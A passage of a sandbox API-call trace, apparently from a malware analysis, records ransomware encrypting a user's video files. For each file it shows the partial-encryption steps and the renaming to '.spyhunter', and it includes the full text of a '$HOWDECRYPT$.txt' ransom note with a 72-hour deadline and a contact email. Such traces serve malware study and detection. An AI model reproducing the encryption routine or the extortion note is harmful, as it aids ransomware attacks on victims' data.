Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f050*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f050*=0x30) returned 1 [0147.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\4InsgkS6o.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\4insgks6o.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.447] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\4InsgkS6o.swf") returned 59 [0147.447] StrStrW (lpFirst="4InsgkS6o.swf", lpSrch=".txt") returned 0x0 [0147.447] GetProcessHeap () returned 0x2c0000 [0147.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.447] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f014*=0x2800, lpOverlapped=0x0) returned 1 [0147.448] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.448] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f014*=0x2800, lpOverlapped=0x0) returned 1 [0147.448] GetProcessHeap () returned 0x2c0000 [0147.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.448] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.449] WriteFile (in: hFile=0xa0, lpBuffer=0x248f054*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x248f054*, lpNumberOfBytesWritten=0x248f014*=0x4, lpOverlapped=0x0) returned 1 [0147.449] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f014, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f014*=0x30, lpOverlapped=0x0) returned 1 [0147.449] CloseHandle (hObject=0xa0) returned 1 [0147.449] GetProcessHeap () returned 0x2c0000 [0147.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.449] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\4InsgkS6o.swf.spyhunter") returned 69 [0147.449] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\4InsgkS6o.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\4insgks6o.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wXSl\\4InsgkS6o.swf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wxsl\\4insgks6o.swf.spyhunter")) returned 1 [0147.450] GetProcessHeap () returned 0x2c0000 [0147.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.450] GetProcessHeap () returned 0x2c0000 [0147.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.450] GetProcessHeap () returned 0x2c0000 [0147.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e3b8 | out: hHeap=0x2c0000) returned 1 [0147.450] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f050 | out: pbBuffer=0x248f050) returned 1 [0147.450] GetProcessHeap () returned 0x2c0000 [0147.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.451] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f048*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f048*=0x30) returned 1 [0147.451] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WVcFTG_w_gpD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wvcftg_w_gpd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.451] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WVcFTG_w_gpD.avi") returned 57 [0147.451] StrStrW (lpFirst="WVcFTG_w_gpD.avi", lpSrch=".txt") returned 0x0 [0147.451] GetProcessHeap () returned 0x2c0000 [0147.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.451] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f00c*=0x2800, lpOverlapped=0x0) returned 1 [0147.452] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.452] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f00c*=0x2800, lpOverlapped=0x0) returned 1 [0147.453] GetProcessHeap () returned 0x2c0000 [0147.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.453] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.453] WriteFile (in: hFile=0xa0, lpBuffer=0x248f04c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x248f04c*, lpNumberOfBytesWritten=0x248f00c*=0x4, lpOverlapped=0x0) returned 1 [0147.453] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f00c*=0x30, lpOverlapped=0x0) returned 1 [0147.453] CloseHandle (hObject=0xa0) returned 1 [0147.453] GetProcessHeap () returned 0x2c0000 [0147.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.453] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WVcFTG_w_gpD.avi.spyhunter") returned 67 [0147.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WVcFTG_w_gpD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wvcftg_w_gpd.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\WVcFTG_w_gpD.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wvcftg_w_gpd.avi.spyhunter")) returned 1 [0147.454] GetProcessHeap () returned 0x2c0000 [0147.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.454] GetProcessHeap () returned 0x2c0000 [0147.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.454] GetProcessHeap () returned 0x2c0000 [0147.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e2f8 | out: hHeap=0x2c0000) returned 1 [0147.455] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f050 | out: pbBuffer=0x248f050) returned 1 [0147.455] GetProcessHeap () returned 0x2c0000 [0147.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.455] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f048*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f048*=0x30) returned 1 [0147.455] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wlhs60vyVBe-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wlhs60vyvbe-.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.455] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wlhs60vyVBe-.mp4") returned 57 [0147.455] StrStrW (lpFirst="wlhs60vyVBe-.mp4", lpSrch=".txt") returned 0x0 [0147.455] GetProcessHeap () returned 0x2c0000 [0147.455] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.455] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f00c*=0x2800, lpOverlapped=0x0) returned 1 [0147.456] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.456] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f00c*=0x2800, lpOverlapped=0x0) returned 1 [0147.457] GetProcessHeap () returned 0x2c0000 [0147.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.457] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.457] WriteFile (in: hFile=0xa0, lpBuffer=0x248f04c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x248f04c*, lpNumberOfBytesWritten=0x248f00c*=0x4, lpOverlapped=0x0) returned 1 [0147.457] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f00c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f00c*=0x30, lpOverlapped=0x0) returned 1 [0147.457] CloseHandle (hObject=0xa0) returned 1 [0147.457] GetProcessHeap () returned 0x2c0000 [0147.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.457] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wlhs60vyVBe-.mp4.spyhunter") returned 67 [0147.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wlhs60vyVBe-.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wlhs60vyvbe-.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\wlhs60vyVBe-.mp4.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\wlhs60vyvbe-.mp4.spyhunter")) returned 1 [0147.458] GetProcessHeap () returned 0x2c0000 [0147.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.458] GetProcessHeap () returned 0x2c0000 [0147.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.458] GetProcessHeap () returned 0x2c0000 [0147.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e238 | out: hHeap=0x2c0000) returned 1 [0147.459] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f048 | out: pbBuffer=0x248f048) returned 1 [0147.459] GetProcessHeap () returned 0x2c0000 [0147.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f040*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f040*=0x30) returned 1 [0147.459] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O-n9FG5jIr1QeF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o-n9fg5jir1qef.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O-n9FG5jIr1QeF.avi") returned 59 [0147.459] StrStrW (lpFirst="O-n9FG5jIr1QeF.avi", lpSrch=".txt") returned 0x0 [0147.459] GetProcessHeap () returned 0x2c0000 [0147.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.459] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f004, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f004*=0x1ee7, lpOverlapped=0x0) returned 1 [0147.460] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffe119, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.460] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1ee7, lpNumberOfBytesWritten=0x248f004, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f004*=0x1ee7, lpOverlapped=0x0) returned 1 [0147.461] GetProcessHeap () returned 0x2c0000 [0147.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.461] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.461] WriteFile (in: hFile=0xa0, lpBuffer=0x248f044*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f004, lpOverlapped=0x0 | out: lpBuffer=0x248f044*, lpNumberOfBytesWritten=0x248f004*=0x4, lpOverlapped=0x0) returned 1 [0147.461] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f004, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f004*=0x30, lpOverlapped=0x0) returned 1 [0147.461] CloseHandle (hObject=0xa0) returned 1 [0147.461] GetProcessHeap () returned 0x2c0000 [0147.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.461] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O-n9FG5jIr1QeF.avi.spyhunter") returned 69 [0147.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O-n9FG5jIr1QeF.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o-n9fg5jir1qef.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\O-n9FG5jIr1QeF.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\o-n9fg5jir1qef.avi.spyhunter")) returned 1 [0147.462] GetProcessHeap () returned 0x2c0000 [0147.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.462] GetProcessHeap () returned 0x2c0000 [0147.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.462] GetProcessHeap () returned 0x2c0000 [0147.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2e178 | out: hHeap=0x2c0000) returned 1 [0147.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.463] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.463] WriteFile (in: hFile=0xa0, lpBuffer=0x248ef7b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f0a4, lpOverlapped=0x0 | out: lpBuffer=0x248ef7b*, lpNumberOfBytesWritten=0x248f0a4*=0x127, lpOverlapped=0x0) returned 1 [0147.464] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.464] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f0a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f0a4*=0x2ac, lpOverlapped=0x0) returned 1 [0147.464] CloseHandle (hObject=0xa0) returned 1 [0147.465] GetProcessHeap () returned 0x2c0000 [0147.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f8b8 | out: hHeap=0x2c0000) returned 1 [0147.465] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f040 | out: pbBuffer=0x248f040) returned 1 [0147.465] GetProcessHeap () returned 0x2c0000 [0147.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.465] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f038*=0x30) returned 1 [0147.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\pCNv_RzsVh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\pcnv_rzsvh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.466] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\pCNv_RzsVh.avi") returned 61 [0147.466] StrStrW (lpFirst="pCNv_RzsVh.avi", lpSrch=".txt") returned 0x0 [0147.466] GetProcessHeap () returned 0x2c0000 [0147.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.466] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248effc*=0x2800, lpOverlapped=0x0) returned 1 [0147.467] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.467] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248effc*=0x2800, lpOverlapped=0x0) returned 1 [0147.467] GetProcessHeap () returned 0x2c0000 [0147.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.467] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.467] WriteFile (in: hFile=0xa0, lpBuffer=0x248f03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x248f03c*, lpNumberOfBytesWritten=0x248effc*=0x4, lpOverlapped=0x0) returned 1 [0147.467] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248effc*=0x30, lpOverlapped=0x0) returned 1 [0147.467] CloseHandle (hObject=0xa0) returned 1 [0147.468] GetProcessHeap () returned 0x2c0000 [0147.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.468] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\pCNv_RzsVh.avi.spyhunter") returned 71 [0147.468] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\pCNv_RzsVh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\pcnv_rzsvh.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\pCNv_RzsVh.avi.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\pcnv_rzsvh.avi.spyhunter")) returned 1 [0147.469] GetProcessHeap () returned 0x2c0000 [0147.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0147.469] GetProcessHeap () returned 0x2c0000 [0147.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.469] GetProcessHeap () returned 0x2c0000 [0147.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302f7f0 | out: hHeap=0x2c0000) returned 1 [0147.469] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f040 | out: pbBuffer=0x248f040) returned 1 [0147.469] GetProcessHeap () returned 0x2c0000 [0147.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f038*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f038*=0x30) returned 1 [0147.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\mgNZKVhmEg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\n2-si\\mgnzkvhmeg.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.470] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\n2-si\\mgNZKVhmEg.mkv") returned 61 [0147.470] StrStrW (lpFirst="mgNZKVhmEg.mkv", lpSrch=".txt") returned 0x0 [0147.470] GetProcessHeap () returned 0x2c0000 [0147.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.470] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248effc*=0x2800, lpOverlapped=0x0) returned 1 [0147.471] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.471] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248effc*=0x2800, lpOverlapped=0x0) returned 1 [0147.471] GetProcessHeap () returned 0x2c0000 [0147.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.471] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.471] WriteFile (in: hFile=0xa0, lpBuffer=0x248f03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x248f03c*, lpNumberOfBytesWritten=0x248effc*=0x4, lpOverlapped=0x0) returned 1 [0147.472] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248effc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248effc*=0x30, lpOverlapped=0x0) returned 1 [0147.472] CloseHandle (hObject=0xa0) returned 1 [0147.472] GetProcessHeap () returned 0x2c0000 [0147.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0147.472] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 